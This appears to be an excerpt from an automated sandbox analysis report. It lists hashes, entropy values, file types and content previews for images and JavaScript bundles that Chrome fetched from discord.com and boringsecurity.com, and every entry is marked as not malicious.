                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], progressive, precision 8, 160x160, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):20244
                                                                          Entropy (8bit):7.26786180956321
                                                                          Encrypted:false
                                                                          SSDEEP:384:QH7ibsFRnnAzAbZ7uHnm4zJwe6y6YBOx8cJ85YeLEjJpi/JFT:07asFRnQckmo7lOx8X5nQjOJFT
                                                                          MD5:1AE2FE6E4C4F9AF49077B14EAA54335F
                                                                          SHA1:A71254C1D91FF1B5194908F21B4ACFBDB742A97F
                                                                          SHA-256:16B501E146C4160748678F2D95EFC063BAB993E2EC0F23B9C4E9BD7FB9978FF6
                                                                          SHA-512:CB7599119FD07DDD48EB426D0015FDC97C77EB3BF5D997CCE9838E655127C40823839DEBBC087ED41D5CC3CF3AF3278640A21C823223798E28AC55555012F046
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/images/bs_x_murall_160.jpg
                                                                          Preview:....."Exif..MM.*.........................HPhotoshop 3.0.8BIM................8BIM.%........\./....{g..d.8BIM.:....................printOutput........PstSbool.....Inteenum....Inte....Clrm....printSixteenBitbool.....printerNameTEXT..........printProofSetupObjc.....P.r.o.o.f. .S.e.t.u.p......proofSetup........Bltnenum....builtinProof....proofCMYK.8BIM.;.....-..............printOutputOptions........Cptnbool.....Clbrbool.....RgsMbool.....CrnCbool.....CntCbool.....Lblsbool.....Ngtvbool.....EmlDbool.....Intrbool.....BckgObjc..........RGBC........Rd doub@o..........Grn doub@o..........Bl doub@o..........BrdTUntF#Rlt............Bld UntF#Rlt............RsltUntF#Pxl@R..........vectorDatabool.....PgPsenum....PgPs....PgPC....LeftUntF#Rlt............Top UntF#Rlt............Scl UntF#Prc@Y..........cropWhenPrintingbool.....cropRectBottomlong........cropRectLeftlong........cropRectRightlong........cropRectToplong.....8BIM.........H.......H......8BIM.&................?...8BIM..................8BIM....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (27731)
                                                                          Category:downloaded
                                                                          Size (bytes):27786
                                                                          Entropy (8bit):5.238715655124617
                                                                          Encrypted:false
                                                                          SSDEEP:768:2p1gZ3neLCHXgq4XYxch1qp06oX1i+APhd/Br:aeZ3eLus0p7HBr
                                                                          MD5:3AA40D83679327FF02A2D99B10D19A70
                                                                          SHA1:5A8EFFF3CF12E2756F85963BC02911055B3365DC
                                                                          SHA-256:27069F17D529819A9A7696E217C2BEF1A6967EFB4C8BE0C07C02BE52562B2390
                                                                          SHA-512:52DDEA8F8829DD81EE8362BCF597C09C35EA6A5CF4ABF7F5FA4FE16B29A318A944A80B0674F747F1802DAA6A177C7FA641E73E64028646A38A207EACAC4A7132
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/83554.2a246a1047818167dc16.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["83554"],{179935:function(e,t,r){"use strict";r.r(t),r.d(t,{fetchReferralsRemaining:function(){return C},checkRecipientEligibility:function(){return a},createReferralTrial:function(){return f},resolveReferralTrialOffer:function(){return _}});var l=r("872717"),n=r("913144"),i=r("819689"),u=r("18494"),s=r("49111");let C=()=>(n.default.dispatch({type:"BILLING_REFERRALS_REMAINING_FETCH_START"}),l.default.get({url:s.Endpoints.GET_REFERRALS_REMAINING,oldFormErrors:!0}).then(e=>{n.default.dispatch({type:"BILLING_REFERRALS_REMAINING_FETCH_SUCCESS",referrals_remaining:null!=e.body&&null!=e.body.referrals_remaining?e.body.referrals_remaining:0,sent_user_ids:null!=e.body&&null!=e.body.sent_user_ids?e.body.sent_user_ids:[]})},()=>{n.default.dispatch({type:"BILLING_REFERRALS_REMAINING_FETCH_FAIL"})})),a=e=>(n.default.dispatch({type:"BILLING_CREATE_REFERRAL_PREVIEW_START",recipientId:e}),l.default.post({url:s.Endpoints.CREATE_REF
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:dropped
                                                                          Size (bytes):4818
                                                                          Entropy (8bit):7.915007544516778
                                                                          Encrypted:false
                                                                          SSDEEP:96:P8UKh06srmM+s2ytcG2dW6k5i0RMRciP6svO3gxq07X:PAhHsrzx2ytQ/OMGiPq3E7X
                                                                          MD5:0532C353B97F01651CED42C3F905D3D6
                                                                          SHA1:636069F46ABF03D0D95159969A7614BB9F5784E2
                                                                          SHA-256:1EC97AE4584C28A03CB37AB77E18C14AEDA246E0E85160A06DF06CD15DBFAE1B
                                                                          SHA-512:43BC53B918D95CA6F0BD3302FC78311EE6E931EFE41B9D4AD8A96B29D201F1D80CAB2A0B49A2EF0D50B4831B4455742380D5E71F0E07E3F8EE02EFAF9828602B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................@........................!..1AQ..aq."2...#BRr......3.45C..Sbc..................................5........................!1A.Q..aq....2.....#3B.."Cb............?..J..rY.D.B.....!.8.!.G..H...BD!.P.7$...G$..G.5.p...%..`.(^..x8/I..D9.o.,.....H.......$G$!.HB.%.%B..+.R.Q@.H.x....].7e}..%....Q...+P...:fAK.c......V..@.!.'...S.V.....l.S..v6..9../.s...'..AT.TS<...bp......xy..8P0t....X.......~.....bY..3.-.Xax!.D....._.v..Ka.y........2.s.4e.........<;..f.IT..fk(C...0.r....?E.....}=DFh..G....x.....R:.j...=.5.d.B......R'..~....\.G=.Y.`.>.OX.rN..S@..V.x...*.1......oeq.............X.D....B.l.ws.o9.... ..i.\.Kj.\..Z..5^5#.d.m.|W...>.Y)d..B......S....h.#e..a.T1.3l..R.1..x-{N.<AH.[aL.-=...U-..}.~.%\N)g......=.~......F.J.%.N..qB..!.HNS4..&.e........;/Li{.F.K.@.u..v.@..W.%w.>.eD......+(..Z
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (36432)
                                                                          Category:downloaded
                                                                          Size (bytes):36481
                                                                          Entropy (8bit):5.485728455840405
                                                                          Encrypted:false
                                                                          SSDEEP:768:HPMKRlIlXXngn6k3XszMSbJC1Epm+B5iDovJXBQ:v5RlIlXXngn6k3XsYSbJC1Epm+B5iDoo
                                                                          MD5:557DF60EF7D323018C69B9BD48093933
                                                                          SHA1:EE56D9805AB8490FBF94E72C4B5DA20F0584CB98
                                                                          SHA-256:5B3924D55DBE4DA2DF653DA517376DCDC7FEBDAA32D876534A85E006D163FABE
                                                                          SHA-512:2E269C4DC31DB2D6CC0D0F028579C0E2229F49B293C532DB60A3471AF239E666E7B341B5C614E5AB41298CAF9FB2AB75749F3F7F1BE89145F7886232E805E4D7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/25b01771fdb72758a986.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["66473"],{648529:function(e,t,n){"use strict";e.exports=n.p+"575be5cb28925216b2fb.svg"},522874:function(e,t,n){"use strict";n.r(t),n.d(t,{shouldShowFraudMenuVariant:function(){return r}});var a=n("862205");let l=(0,a.createExperiment)({kind:"user",id:"2023-08_iar_fraud_impersonation",label:"In App Reports Fruad & Impersonation",defaultConfig:{showFraudMenuVariant:!1},treatments:[{id:1,label:"Enabled",config:{showFraudMenuVariant:!0}}]});function r(){let{showFraudMenuVariant:e}=l.getCurrentConfig({location:"159afe_2"},{autoTrackExposure:!0});return e}},821003:function(e,t,n){"use strict";n.r(t),n.d(t,{REMEDIATION_ELEMENT_TYPES:function(){return a}});let a=["block_users","leave_guild","delete_message"]},143618:function(e,t,n){"use strict";var a,l,r,s;n.r(t),n.d(t,{ReportNames:function(){return a},UnauthenticatedReportNames:function(){return l}}),(r=a||(a={})).GUILD="guild",r.GUILD_DISCOVERY="guild_discovery",r.GUILD_D
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):139
                                                                          Entropy (8bit):4.710597482771287
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+lFAATcvdnmFFSDDmJS4RKb5KGMXf/FGc8qQAGrqLW:t6Abli/m03mc4sldMX9QAw
                                                                          MD5:72A8B168AD2C7EEA7B2559B5690C7695
                                                                          SHA1:85E4F43154EA713C832BA27128A33EB7B2A7CF7A
                                                                          SHA-256:1F988D1AD4AB163D61A584254C07D75F3241EB6380BF48BF7D8F981E13C092CD
                                                                          SHA-512:11BCB1A3623B97C9DD2F22D0389B3CA05AB4F99596DE5D07C50C1FC83F7532D8C20B58379C54C38F503D86D8C2CAF52AF3B35FFCCDC4750089ABAF86C1C5294E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/321a07cbc6f5919dbce9.svg
                                                                          Preview:<svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], progressive, precision 8, 160x160, components 3
                                                                          Category:dropped
                                                                          Size (bytes):20244
                                                                          Entropy (8bit):7.26786180956321
                                                                          Encrypted:false
                                                                          SSDEEP:384:QH7ibsFRnnAzAbZ7uHnm4zJwe6y6YBOx8cJ85YeLEjJpi/JFT:07asFRnQckmo7lOx8X5nQjOJFT
                                                                          MD5:1AE2FE6E4C4F9AF49077B14EAA54335F
                                                                          SHA1:A71254C1D91FF1B5194908F21B4ACFBDB742A97F
                                                                          SHA-256:16B501E146C4160748678F2D95EFC063BAB993E2EC0F23B9C4E9BD7FB9978FF6
                                                                          SHA-512:CB7599119FD07DDD48EB426D0015FDC97C77EB3BF5D997CCE9838E655127C40823839DEBBC087ED41D5CC3CF3AF3278640A21C823223798E28AC55555012F046
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:....."Exif..MM.*.........................HPhotoshop 3.0.8BIM................8BIM.%........\./....{g..d.8BIM.:....................printOutput........PstSbool.....Inteenum....Inte....Clrm....printSixteenBitbool.....printerNameTEXT..........printProofSetupObjc.....P.r.o.o.f. .S.e.t.u.p......proofSetup........Bltnenum....builtinProof....proofCMYK.8BIM.;.....-..............printOutputOptions........Cptnbool.....Clbrbool.....RgsMbool.....CrnCbool.....CntCbool.....Lblsbool.....Ngtvbool.....EmlDbool.....Intrbool.....BckgObjc..........RGBC........Rd doub@o..........Grn doub@o..........Bl doub@o..........BrdTUntF#Rlt............Bld UntF#Rlt............RsltUntF#Pxl@R..........vectorDatabool.....PgPsenum....PgPs....PgPC....LeftUntF#Rlt............Top UntF#Rlt............Scl UntF#Prc@Y..........cropWhenPrintingbool.....cropRectBottomlong........cropRectLeftlong........cropRectRightlong........cropRectToplong.....8BIM.........H.......H......8BIM.&................?...8BIM..................8BIM....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (30536)
                                                                          Category:downloaded
                                                                          Size (bytes):30591
                                                                          Entropy (8bit):5.687571771770065
                                                                          Encrypted:false
                                                                          SSDEEP:384:bqxzaUvippPjfqSroeN/sn+fw+StTuvj5H8/H0z0hazjgNWrjQp6nug+m6OQLY94:bqxzaeKpRH864a6GmsPlSS1ihJ3tTV
                                                                          MD5:F973E963DBF61848DCA46557AE8F730B
                                                                          SHA1:1D39C05A82915082398B2CB89BD2767FB7B3478C
                                                                          SHA-256:B89DBC9B5806AA83F5EDD584F61EA8FF7EED466A94504A863ED38EE1D069808F
                                                                          SHA-512:7BEB12E5DD0B9D370CB120DAED106CB199B498951F24644C785D75A2CB75F5802ACBFDFD5825D5C02B00FE44731D628B189ED1F2CE1A5ABEFF124DAD8BC506F4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/94491.e9bbfb32dd44ea7e36a4.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["94491"],{979295:function(e,t,a){"use strict";e.exports=a.p+"bf10b4db797e1264170f.gif"},672407:function(e,t,a){"use strict";e.exports=a.p+"fe7719aef8a8e68f0648.gif"},341117:function(e,t,a){"use strict";e.exports=a.p+"444ef3f0048b8d30799f.gif"},268351:function(e,t,a){"use strict";e.exports=a.p+"70d38d06990a137df664.gif"},528906:function(e,t,a){"use strict";e.exports=a.p+"32f57771152bf03eeff1.gif"},220054:function(e,t,a){"use strict";e.exports=a.p+"f49a39b40eb9d180fc88.gif"},696246:function(e,t,a){"use strict";e.exports=a.p+"23808e559cfef1d23276.svg"},231185:function(e,t,a){"use strict";e.exports=a.p+"606576712b69844bb246.svg"},943722:function(e,t,a){"use strict";a.r(t),a.d(t,{ActivityEmoji:function(){return I},default:function(){return M}}),a("222007");var n=a("37983"),l=a("884691"),s=a("414456"),i=a.n(s),r=a("446674"),u=a("77078"),o=a("430568"),d=a("309570"),c=a("29088"),f=a("867805"),T=a("699209"),E=a("32346"),A=a(
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):213346
                                                                          Entropy (8bit):5.61979086200372
                                                                          Encrypted:false
                                                                          SSDEEP:6144:GHZ/Ki/dC9f8czQzCg3VxQeTu6JryTCcaVsvLzCby:GpuzQzweyTVhCby
                                                                          MD5:91110B7D7784193763DE0A6E8331660B
                                                                          SHA1:5B7943704165FABEE9612795DFC3B083946D94C9
                                                                          SHA-256:AFBD1EE18CF8823C623CF42111B5E319FA4DBE951BCB5743CA63A36E13447D35
                                                                          SHA-512:FA5F09D3C65575A0FEAE5A4D7AE57D2447397C07A15C3A9E9F55D2775494CF62494B540F3BBB510EE9BA91F45B6274199FF5D4D4619BAD20926DC0A6B2ECDED5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/56145.ca77ff8c50f941ccf356.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["56145"],{777483:function(e,t,n){var l={"./icon-file-acrobat.svg":"668973","./icon-file-ae.svg":"124036","./icon-file-ai.svg":"721569","./icon-file-archive.svg":"644286","./icon-file-audio.svg":"597346","./icon-file-code.svg":"380499","./icon-file-document.svg":"50617","./icon-file-image.svg":"972094","./icon-file-ps.svg":"92729","./icon-file-sketch.svg":"335000","./icon-file-spreadsheet.svg":"302872","./icon-file-unknown.svg":"425914","./icon-file-video.svg":"272477","./icon-file-webcode.svg":"164059"};function a(e){return n(s(e))}function s(e){if(!n.o(l,e)){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return l[e]}a.id='"777483"',a.keys=function(){return Object.keys(l)},a.resolve=s,e.exports=a},447341:function(e,t,n){"use strict";e.exports="data:image/svg+xml;utf8,%3Csvg%20width%3D%22256%22%20height%3D%2278%22%20viewBox%3D%2232%2024%20256%2078%22%20fill%3D%22none%22%20xmlns%3D%22http%
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (7318), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):7318
                                                                          Entropy (8bit):5.7806066419482285
                                                                          Encrypted:false
                                                                          SSDEEP:192:NOsjiF4q58ZHmyiVwtesBOxsZKPpcQRJsd:NOMqV4telmZQRJy
                                                                          MD5:1CADA2EB2ED8DEFB8CA4770F86BB70AD
                                                                          SHA1:B8E8BB6A83AAACBDFC2166C3204C33651C779652
                                                                          SHA-256:E10221D444F57BBC596E06A6FF51625B7040246A01AC4866CE1B8205F9FCD878
                                                                          SHA-512:68159BEF7E7CE686FAAFADC3814CB9199306471FCE93B50F3229E50109051ED121EEFE29D5BB78874418E6EFF228662102DFF6C5AB2E9F58781820F31B5F736F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/56d3063b/main.js
                                                                          Preview:window._cf_chl_opt={cFPWv:'b'};~function(R,g,h,i,j,w){R=b,function(d,e,Q,f,y){for(Q=b,f=d();!![];)try{if(y=-parseInt(Q(224))/1+-parseInt(Q(253))/2+-parseInt(Q(239))/3+parseInt(Q(211))/4+-parseInt(Q(196))/5+parseInt(Q(163))/6*(-parseInt(Q(172))/7)+parseInt(Q(217))/8*(parseInt(Q(252))/9),y===e)break;else f.push(f.shift())}catch(z){f.push(f.shift())}}(a,836824),g=this||self,h=g[R(223)],i={},i[R(214)]='o',i[R(244)]='s',i[R(249)]='u',i[R(254)]='z',i[R(192)]='n',i[R(175)]='I',i[R(190)]='b',j=i,g[R(203)]=function(d,f,y,z,W,B,C,D,E,F,G){if(W=R,f===null||f===void 0)return z;for(B=m(f),d[W(215)][W(189)]&&(B=B[W(212)](d[W(215)][W(189)](f))),B=d[W(246)][W(257)]&&d[W(164)]?d[W(246)][W(257)](new d[(W(164))](B)):function(H,X,I){for(X=W,H[X(229)](),I=0;I<H[X(191)];H[I+1]===H[I]?H[X(193)](I+1,1):I+=1);return H}(B),C='nAsAaAb'.split('A'),C=C[W(198)][W(176)](C),D=0;D<B[W(191)];E=B[D],F=l(d,f,E),C(F)?(G='s'===F&&!d[W(255)](f[E]),W(183)===y+E?A(y+E,F):G||A(y+E,f[E])):A(y+E,F),D++);return z;function A(H,I,V
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (12107)
                                                                          Category:downloaded
                                                                          Size (bytes):12162
                                                                          Entropy (8bit):5.48807302501843
                                                                          Encrypted:false
                                                                          SSDEEP:192:kYVVtiSflfxtqmnY8OFIIqmnO+BvbaqZhQ7HYsWCQXVc6xBBmT66ck1/OFTtRm:DtiUWFNnBvbaqZhQLY+QXVc6Eck1kRm
                                                                          MD5:0C76572EBF9E008E9B3C6AF93595E7CD
                                                                          SHA1:455B0AB60A5389E30685458C9639E11B0F63A109
                                                                          SHA-256:AAA90C742804884D05605FD55B57F859D9E8EB41827730CA38B84181AA494000
                                                                          SHA-512:22E52E5A15647346F6C4E1241FB0D03A4F807AE761478BC4754EAF80CCA043D72B16F16B8A784A886B3BF48C0BC0E7826345F5D650FB6413601A9C4F06225F78
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/76546.c03cce63ade2b24646c3.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["76546"],{255403:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return m}});var i=n("759843"),a=n("872717"),r=n("913144"),s=n("448993"),o=n("599110"),u=n("840707"),l=n("210898"),d=n("856368"),c=n("697543"),g=n("49111"),f=n("782340");n("2581");var m={resetSuggestions:()=>r.default.dispatch({type:"POMELO_SUGGESTIONS_RESET"}),async fetchSuggestionsRegistration(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1500;if((0,c.hasRegistrationUsernameSuggestions)()){r.default.dispatch({type:"POMELO_SUGGESTIONS_RESET"});try{var n;let i=await a.default.get({url:g.Endpoints.POMELO_SUGGESTIONS_UNAUTHED,query:null==e?void 0:{global_name:e},timeout:t});if(i.ok&&(null===(n=i.body)||void 0===n?void 0:n.username)!=null)return r.default.dispatch({type:"POMELO_REGISTRATION_SUGGESTIONS_SUCCESS",suggestion:i.body,source:e})}catch(e){return}}},async fetchSuggestions(e){if((0,d.isInPomeloSuggestionsExperiment)(
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):654418
                                                                          Entropy (8bit):5.491520876426554
                                                                          Encrypted:false
                                                                          SSDEEP:6144:ADZDFi6A+DsZITFenpmMdn+ZdMbve6FtJHld8o2ZRdohcZd:ADZDFijTlhY
                                                                          MD5:C88EFECB0CBB52102620024C4018C487
                                                                          SHA1:38EB68EF0E258347BAE6DC89CEC1E78B51E811BD
                                                                          SHA-256:F9FCB015DDD6FAA17541B69683DF69471A10EA16B96FAE874DCE424DC8A062D3
                                                                          SHA-512:9F6540AF9D4D55EB34AFD942FB8E05B37045AECE179BE07F996543A667B353753D813273EA30AD4F4650C27B052FA183FA953C5BAB2DC16ACB6D8D1AF045F9A8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/98086.6b10664a8a1ecdf8a01d.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["98086"],{952110:function(e,s,n){"use strict";n.r(s),n.d(s,{emojiTermsImporter:function(){return i}});let i={bg:()=>n.el("326778").then(n.t.bind(n,"326778",19)),cs:()=>n.el("838264").then(n.t.bind(n,"838264",19)),da:()=>n.el("573975").then(n.t.bind(n,"573975",19)),de:()=>n.el("4282").then(n.t.bind(n,"4282",19)),el:()=>n.el("16046").then(n.t.bind(n,"16046",19)),"en-US":()=>n.el("240419").then(n.t.bind(n,"240419",19)),"es-ES":()=>n.el("613364").then(n.t.bind(n,"613364",19)),fi:()=>n.el("641819").then(n.t.bind(n,"641819",19)),fr:()=>n.el("396103").then(n.t.bind(n,"396103",19)),hr:()=>n.el("611523").then(n.t.bind(n,"611523",19)),hu:()=>n.el("799904").then(n.t.bind(n,"799904",19)),it:()=>n.el("66179").then(n.t.bind(n,"66179",19)),ja:()=>n.el("634557").then(n.t.bind(n,"634557",19)),ko:()=>n.el("970725").then(n.t.bind(n,"970725",19)),lt:()=>n.el("699836").then(n.t.bind(n,"699836",19)),nl:()=>n.el("534178").then(n.t.bind(n,
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (56238)
                                                                          Category:downloaded
                                                                          Size (bytes):536517
                                                                          Entropy (8bit):5.394256003490799
                                                                          Encrypted:false
                                                                          SSDEEP:6144:A7rFYpM/8XvYaTaqxDgOXx53aE5DIle1zTXogIUGiX/jBG9tUn57DHJZ45Onucij:wCgO++DIle1z8a7/dGKS98A
                                                                          MD5:6F599210DB8169B4BAF1CFBAE23BD9D5
                                                                          SHA1:561E033E5125300ABF9DE0840857AA689233E929
                                                                          SHA-256:A662D404207899D177B34D828DC7B46E762A266C4A5A02A2781ED0D2F40D7E1B
                                                                          SHA-512:18353748C470A747E5230B932C9AE43EBABF8F9526E5ABACAA5D4337BF9C3E5FEC2D7A5F0292331F1B5B18BB90AAB58D80DE7C6927A3A6B3235AECFD666ADC8A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/pages/_app-82695a3e9af0e644.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{6050:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n=r(5554);function i(e,t,r){return void 0===t&&(t=new Uint8Array(2)),void 0===r&&(r=0),t[r+0]=e>>>8,t[r+1]=e>>>0,t}function o(e,t,r){return void 0===t&&(t=new Uint8Array(2)),void 0===r&&(r=0),t[r+0]=e>>>0,t[r+1]=e>>>8,t}function a(e,t){return void 0===t&&(t=0),e[t]<<24|e[t+1]<<16|e[t+2]<<8|e[t+3]}function s(e,t){return void 0===t&&(t=0),(e[t]<<24|e[t+1]<<16|e[t+2]<<8|e[t+3])>>>0}function u(e,t){return void 0===t&&(t=0),e[t+3]<<24|e[t+2]<<16|e[t+1]<<8|e[t]}function c(e,t){return void 0===t&&(t=0),(e[t+3]<<24|e[t+2]<<16|e[t+1]<<8|e[t])>>>0}function l(e,t,r){return void 0===t&&(t=new Uint8Array(4)),void 0===r&&(r=0),t[r+0]=e>>>24,t[r+1]=e>>>16,t[r+2]=e>>>8,t[r+3]=e>>>0,t}function f(e,t,r){return void 0===t&&(t=new Uint8Array(4)),void 0===r&&(r=0),t[r+0]=e>>>0,t[r+1]=e>>>8,t[r+2]=e>>>16,t[r+3]=e>>>24,t}function h(e,t,r){return void 0===t&&(t=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):201090
                                                                          Entropy (8bit):5.371208962616754
                                                                          Encrypted:false
                                                                          SSDEEP:3072:mbc9n9hTjLgHxd20fJ7RLmbez35m4ssnPrP:T9z3fAB8b+OsnPrP
                                                                          MD5:8CD8D0BC5B146F190F282CDADA0CADD9
                                                                          SHA1:1768219C0ACB75E23D32DDC744DBA4A7F5A2C69B
                                                                          SHA-256:0DD66470FB37396F660FDEEF19D012A9E00D99F03680A6A48CD55A9ADD5AA923
                                                                          SHA-512:97585112FA111A402CB1A5AD8AF1C9116E1434B844356EDD6035E97E3D74D8200B41052357E119111A55705ED40E7CDAD70F000A4C2834A90E28DA4C06FCE53A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/64999.3c0486790babc24c66a4.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["64999"],{50323:function(t,e,n){"use strict";n.r(e),n.d(e,{DOMRectReadOnly:function(){return DOMRectReadOnly}}),n("274635");var DOMRectReadOnly=function(){function DOMRectReadOnly(t,e,n,r){return this.x=t,this.y=e,this.width=n,this.height=r,this.top=this.y,this.left=this.x,this.bottom=this.top+this.height,this.right=this.left+this.width,Object.freeze(this)}return DOMRectReadOnly.prototype.toJSON=function(){return{x:this.x,y:this.y,top:this.top,right:this.right,bottom:this.bottom,left:this.left,width:this.width,height:this.height}},DOMRectReadOnly.fromRect=function(t){return new DOMRectReadOnly(t.x,t.y,t.width,t.height)},DOMRectReadOnly}()},79071:function(t,e,n){"use strict";n.r(e),n.d(e,{ResizeObservation:function(){return a}});var r=n("357663"),i=n("170601"),o=n("320810"),a=function(){function t(t,e){this.target=t,this.observedBox=e||r.ResizeObserverBoxOptions.CONTENT_BOX,this.lastReportedSize={inlineSize:0,blockSi
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (44352)
                                                                          Category:downloaded
                                                                          Size (bytes):520847
                                                                          Entropy (8bit):5.457171899826177
                                                                          Encrypted:false
                                                                          SSDEEP:6144:h/7DYCBRiPI6K+5g+q5uMCx+CujQ1kVIkUhqforQbyH4btFdYqOtPpqq:1YuBYsorQbzdYV
                                                                          MD5:A0CDF7CFF869D0192CB32B67E351B7FE
                                                                          SHA1:E323A1B842D1E2AEAA7962625ABEEEDF141E4788
                                                                          SHA-256:700400C326FA87B5571BAD49A43407F3134076292EB100E587B7EA98F5E19AA5
                                                                          SHA-512:872492824AA62839BAEC8CC2F428CCBD103D07725A2B38B553DE5C81E9D44E04939BD7B6F406DB02EE96834FAA8F4772345D6506A830B27983EFB01C97E87739
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/331.02933a2f314cb75f.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[331],{1859:function(t,e,r){"use strict";var n=r(73982);Object.defineProperty(e,"__esModule",{value:!0}),e.CoinbaseWalletSDK=void 0;let i=r(81105),o=r(97543),s=r(44765),a=r(14343),u=r(78768),c=r(43951),l=r(93477),h=n.env.LINK_API_URL||"https://www.walletlink.org",f=n.env.SDK_VERSION||r(29139).i8||"unknown";class d{constructor(t){var e,r,n;let i;this._appName="",this._appLogoUrl=null,this._relay=null,this._relayEventManager=null;let s=t.linkAPIUrl||h;if(i=t.uiConstructor?t.uiConstructor:t=>new a.WalletSDKUI(t),void 0===t.overrideIsMetaMask?this._overrideIsMetaMask=!1:this._overrideIsMetaMask=t.overrideIsMetaMask,this._overrideIsCoinbaseWallet=null===(e=t.overrideIsCoinbaseWallet)||void 0===e||e,this._overrideIsCoinbaseBrowser=null!==(r=t.overrideIsCoinbaseBrowser)&&void 0!==r&&r,t.diagnosticLogger&&t.eventListener)throw Error("Can't have both eventListener and diagnosticLogger options, use only diagnosticLogger");t.eventListener?th
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):3727
                                                                          Entropy (8bit):7.324795230120832
                                                                          Encrypted:false
                                                                          SSDEEP:96:HrUYxsQTXEgJybggggmB4ggggggggg9D0ggggGTgb2+Ts0Nu81g89:H4cXjaTku
                                                                          MD5:FCC4DC0DAE1B8472D99345EF3C6B332F
                                                                          SHA1:6EA78F4557768D6974D7E8353B3D18CB0E99C2DE
                                                                          SHA-256:C173506C90B6BE07802423851FC80DDAF6A65CC17833BC0653EEC1974F189462
                                                                          SHA-512:9AB9F72CEF889477970C3B28D6A709D73A45A28AAD54FC069A50F9E7FF17D5EC54D7916D3A58FAD53757B4898508B8F0A054B9ED33BF7EA355C542D2C945F399
                                                                          Malicious:false
                                                                          Reputation:low
